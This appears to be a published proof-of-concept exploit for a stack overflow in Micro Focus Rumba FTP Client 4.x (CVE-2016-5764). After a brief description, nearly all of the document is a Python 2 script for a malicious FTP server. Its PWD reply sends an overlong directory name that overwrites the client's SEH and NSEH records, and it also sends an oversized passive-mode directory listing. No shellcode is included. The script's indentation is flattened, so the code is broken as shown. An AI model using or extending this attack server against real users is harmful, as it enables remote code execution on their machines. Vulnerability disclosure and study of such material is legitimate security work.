Micro Focus Rumba FTP Client 4.x Stack Overflow

`# Exploit Title: Rumba FTP Client 4.x stack overflow SEH  
# Date: 29-10-2016  
# Exploit Author: Umit Aksu  
# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28731.rumba-ftp-4-x-security-update.aspx  
# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40307  
# Version: 4.x  
# Tested on: Windows 7  
# CVE : CVE-2016-5764  
  
  
  
1. Description  
  
Micro Focus Rumba FTP Client 4.x cannot handle long directory names. An attacker can setup a malicious FTP server that can send a long directory name which can led to remote code execution on the connected client.  
  
2. Proof of Concept  
  
The code below can be used to setup a malicious FTP server that will send a long directory name and overwrite the stack. The PoC only overwrites the SEH + NSEH.  
  
  
# malicious-ftp-Server.py  
  
import socket  
import sys  
import time  
  
# IP Address  
IP = '127.0.0.1' \  
''  
# Create a TCP/IP socket  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
# Bind the socket to the port  
server_address = (IP,21)  
print "Starting up on %s port %s" % server_address  
sock.bind(server_address)  
  
# Listen for incoming connections  
sock.listen(1)  
  
# Wait for incoming connection  
while True:  
print "Waiting for a connection"  
connection, client_address = sock.accept()  
  
try:  
print "Connection from " + str(client_address)  
# Receive the data in small chunks and restransmit it  
connection.send("220 Welcome\r\n")  
  
while(True):  
data = connection.recv(16)  
print "received %s" % data  
if "USER" in data:  
print "Sending 331"  
connection.send("331 Please specify the password.\r\n")  
if "PASS" in data:  
print "Sending 227"  
connection.send("230 Login successful.\n\n")  
if "PWD" in data:  
print "Sending 257"  
  
# 77A632E2 add esp,908 pop pop pop ret  
# THIS IS THE PART WHERE THE OVERFLOW HAPPENS  
connection.send("257 \"/"+"A"*629+"\x45\x45\x45\x45"+ "\x44\x44\x44\x44" + "D"*185 + "rrrr" + "D"*211 + "\"\r\n")  
if "TYPE A" in data:  
print "Sending 200 Switching to ASCII mode."  
connection.send("200 Switching to ASCII mode.\r\n")  
if "TYPE I" in data:  
print "Sending 200 Switching to Binary mode."  
connection.send("200 200 Switching to Binary mode.\r\n")  
if "SYST" in data:  
print "Sending 215"  
connection.send("215 UNIX Type: L8\r\n")  
  
if "SIZE" in data:  
print "Sending 200"  
connection.send("200 Switching to Binary mode. \r\n")  
  
if "FEAT" in data:  
print "Sending 211-Features"  
connection.send("211-Features:\r\n EPRT\r\n EPSV\r\n MDTM\r\n PASV\r\n REST STREAM\r\n SIZE\r\n TVFS\r\n211 End\r\n")  
if "CWD" in data:  
print "Sending 250 Directory successfully changed."  
connection.send("250 Directory successfully changed.\r\n")  
  
if "PASV" in str(data):  
print "Sending 227 Entering Passive Mode (130,161,45,252,111,183)\n\n"  
connection.send("227 Entering Passive Mode (130,161,45,252,111,183)\n\n")  
  
# Listen on new socket for connection  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
print 'Socket created'  
  
#Bind socket to local host and port  
try:  
s.bind((IP, 28599))  
except socket.error as msg:  
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]  
sys.exit()  
  
print 'Socket bind complete for PASV on port 28599'  
  
#Start listening on socket  
s.listen(10)  
print 'Socket now listening on 28599'  
  
#now keep talking with the client  
  
#wait to accept a connection - blocking call  
conn, addr = s.accept()  
print 'Connected with ' + addr[0] + ':' + str(addr[1])  
time.sleep(1)  
print "Sending dir list"  
connection.send("150 Here comes the directory listing.\r\n")  
conn.send("d"*500+"rwx------ 2 500 500 4096 Nov 05 2007 " + "A." + "B"*500 + "\r\n")  
  
# Send ok to ftp client  
connection.send("226 Directory send OK.\r\n")  
  
# close the connection  
s.close()  
conn.close()  
break  
  
if "EXIT" in str(data):  
print "REC"  
connection.send("Have a nice day!\r\n")  
break  
finally:  
connection.close()  
  
`